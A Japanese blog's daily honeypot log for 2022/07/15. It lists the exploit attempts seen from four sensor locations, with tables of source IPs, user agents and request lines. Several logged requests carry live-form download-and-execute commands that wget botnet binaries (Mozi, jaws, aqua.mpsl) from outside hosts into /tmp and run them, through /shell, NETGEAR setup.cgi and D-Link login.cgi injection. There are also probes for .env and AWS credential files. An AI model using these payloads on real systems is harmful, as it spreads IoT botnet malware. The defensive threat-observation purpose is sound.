コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/07/15 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/07/15分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget networkmapping.xyz/jaws;
sh /tmp/jaws
Location:US

NetGear製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget networkmapping.xyz/jaws;
sh /tmp/jaws
Location:UK

zgrabによるスキャン行為
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://194.31.98.205/bins/aqua.mpsl;
sh /tmp/aqua.mpsl
cd /tmp;
rm -rf *;
wget networkmapping.xyz/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:264 (前日比:119)
US:総アクセス数:66 (前日比:-34)
UK:総アクセス数:59 (前日比:-5)
SG:総アクセス数:102 (前日比:25)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
6 20.200.214.205 United States
1 20.219.71.125 United States
2 37.0.8.116 Netherlands
1 40.122.73.20 United States
3 45.61.186.139 United States
1 45.143.200.118 Russia
1 51.142.79.1 United Kingdom
9 54.255.233.232 United States
1 94.232.40.91 Russia
1 94.232.44.25 Russia
1 94.232.44.68 Russia
16 95.214.235.205 Ukraine
1 104.37.190.250 United States
1 106.53.71.128 China
1 107.130.226.91 United States
2 109.237.103.9 Russia
1 120.85.113.46 China
1 128.14.133.58 United States
7 128.199.45.47 United Kingdom
10 135.125.217.54 France
7 135.125.246.110 France
63 157.245.157.31 United States
1 162.55.239.46 Germany
1 172.245.10.76 United States
63 178.128.90.21 United States
2 179.43.142.166 Panama
1 183.136.225.35 China
15 185.7.214.104 Hong Kong
38 185.130.224.43 Netherlands
1 188.112.145.41 Latvia
1 188.166.8.119 United States
3 193.56.29.120 United Kingdom
1 198.235.24.26 United States

UserAgent一覧

件数 UserAgent
12 -
1 AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9
1 Go-http-client/1.1
2 Hello, world
63 Mozilla/5.0 (Linux i386; X11) Gecko/20061206 Firefox/24.0
6 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
15 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
63 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.8 (KHTML, like Gecko) Chrome/28.0.1141.44 Safari/535.25
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
37 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/74.0.3729.121 Mobile/15E148 Safari/605.1
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 Python/3.7 aiohttp/3.7.4.post0
36 curl/7.54.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
4 \x03
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01\x02
2 \x16\x03\x01
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
42 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /.local HTTP/1.1
2 GET /.production HTTP/1.1
2 GET /.remote HTTP/1.1
2 GET //admin/.env HTTP/1.1
2 GET //administrator/.env HTTP/1.1
2 GET //api/.env HTTP/1.1
2 GET //app/.env HTTP/1.1
2 GET //apps/.env HTTP/1.1
2 GET //assets/.env HTTP/1.1
2 GET //config/.env HTTP/1.1
2 GET //core/.env HTTP/1.1
2 GET //core/Datavase/.env HTTP/1.1
2 GET //core/app/.env HTTP/1.1
2 GET //cron/.env HTTP/1.1
2 GET //cronlab/.env HTTP/1.1
2 GET //database/.env HTTP/1.1
2 GET //en/.env HTTP/1.1
2 GET //exapi/.env HTTP/1.1
2 GET //lab/.env HTTP/1.1
2 GET //laravel/.env HTTP/1.1
2 GET //lib/.env HTTP/1.1
2 GET //psnlink/.env HTTP/1.1
2 GET //public/.env HTTP/1.1
2 GET //saas/.env HTTP/1.1
2 GET //site/.env HTTP/1.1
2 GET //sitemaps/.env HTTP/1.1
2 GET //tools/.env HTTP/1.1
2 GET //uploads/.env HTTP/1.1
2 GET //v1/.env HTTP/1.1
2 GET //v2/.env HTTP/1.1
2 GET //vendor/.env HTTP/1.1
2 GET //web/.env HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /YzY0 HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.shtml HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /default.cgi HTTP/1.1
1 GET /default.pl HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /index.aspx HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.pl HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /info HTTP/1.1
1 GET /inicio.cgi HTTP/1.1
1 GET /inicio.html HTTP/1.1
1 GET /inicio.shtml HTTP/1.1
1 GET /js/core.js HTTP/1.1
1 GET /main.jhtml HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /menu.cgi HTTP/1.1
1 GET /menu.shtml HTTP/1.1
1 GET /nmaplowercheck1657813329 HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /readme.txt HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /start.asp HTTP/1.1
1 GET /start.aspx HTTP/1.1
1 GET /start.php HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//azenv[.]net/ HTTP/1.1
1 HEAD / HTTP/1.0
2 HEAD / HTTP/1.1
2 POST //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.188.98.63 United States
1 20.96.9.92 United States
3 37.0.8.116 Netherlands
1 37.0.8.162 Netherlands
1 37.0.8.217 Netherlands
4 45.61.186.139 United States
1 45.143.200.118 Russia
8 51.79.29.48 Canada
1 64.62.197.11 United States
1 66.240.205.34 United States
1 94.232.40.91 Russia
1 94.232.44.25 Russia
1 94.232.44.68 Russia
1 95.241.78.103 Italy
2 109.237.103.9 Russia
1 128.14.134.170 United States
7 128.199.20.240 United Kingdom
1 162.55.239.46 Germany
1 162.142.125.7 United States
1 165.227.215.87 United States
1 167.248.133.120 United States
15 185.7.214.104 Hong Kong
8 185.254.196.223 Ukraine
1 205.210.31.10 United States
1 205.210.31.152 United States
1 223.149.250.193 China

UserAgent一覧

件数 UserAgent
12 -
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
15 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
19 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
1 VLC/3.0.8 LibVLC/3.0.8

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
4 \x03
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
20 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /c/version.js HTTP/1.1
4 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /js/core.js HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
3 2.57.122.80 Romania
2 37.0.8.116 Netherlands
1 37.0.8.162 Netherlands
1 37.0.8.217 Netherlands
5 45.61.186.139 United States
1 45.143.200.118 Russia
1 49.143.32.6 South Korea
1 64.62.197.5 United States
1 66.240.192.82 United States
1 94.232.40.91 Russia
1 94.232.44.25 Russia
1 94.232.44.68 Russia
1 104.37.190.250 United States
1 104.129.48.126 United States
2 109.237.103.9 Russia
1 128.14.209.162 United States
1 162.55.239.46 Germany
1 175.100.20.235 Cambodia
7 178.62.212.160 United States
18 185.7.214.104 Hong Kong
4 185.165.190.17 Seychelles
1 185.196.220.81 Netherlands
1 188.166.8.119 United States
1 198.235.24.14 United States
1 210.19.34.146 Malaysia

UserAgent一覧

件数 UserAgent
12 -
1 AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9
1 Go-http-client/1.1
1 Hello, World
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
4 \x03
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
5 GET /.env HTTP/1.1
1 GET /.sendgrid HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /c/version.js HTTP/1.1
5 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
2 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /js/core.js HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//azenv[.]net/ HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /robots.txt HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
3 37.0.8.116 Netherlands
1 37.0.8.162 Netherlands
1 39.172.105.219 China
3 45.61.186.139 United States
12 51.79.29.48 Canada
1 64.62.197.137 United States
1 66.240.192.82 United States
1 94.232.40.91 Russia
1 94.232.44.25 Russia
1 94.232.44.68 Russia
2 103.136.40.141 India
1 104.37.190.250 United States
2 109.237.103.9 Russia
1 111.43.114.50 China
1 113.116.131.213 China
1 120.253.79.235 China
1 128.14.134.170 United States
7 142.93.209.9 United States
1 147.124.213.130 United States
1 162.55.239.46 Germany
1 162.142.125.211 United States
1 163.47.221.19 New Zealand
1 172.104.138.223 United States
1 175.107.13.123 Pakistan
2 179.43.155.171 Panama
16 185.7.214.104 Hong Kong
23 185.130.224.43 Netherlands
8 185.254.196.223 Ukraine
1 188.165.87.105 France
1 193.118.53.194 United States
1 193.118.53.210 United States
1 197.41.93.155 Egypt
1 205.210.31.15 United States
1 209.127.186.210 Canada

UserAgent一覧

件数 UserAgent
26 -
2 Abcd
1 Go-http-client/1.1
1 Hakai/2.0
2 Hello, World
3 Hello, world
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
16 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (iPhone; CPU OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/28.0 Mobile/15E148 Safari/605.1.15
1 Mozilla/5.0 zgrab/0.x
1 VLC/3.0.8 LibVLC/3.0.8
6 curl/7.54.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
3 \x03
1 \x16\x03\x01\x01D\x01
16 \x16\x03\x01\x02
3 \x16\x03\x01
24 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
3 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /c/version.js HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /fuN3 HTTP/1.0
2 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /js/core.js HTTP/1.1
1 GET /login.cgi?cli=aa%20aa%27;wget%20http[:]//134[.]195[.]138[.]33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1
1 GET /nmaplowercheck1657753799 HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//194[.]31[.]98[.]205/bins/aqua.mpsl;sh+/tmp/aqua.mpsl HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//azenv[.]net/ HTTP/1.1
1 HEAD / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /cn/cmd HTTP/1.1
1 POST /dvr/cmd HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0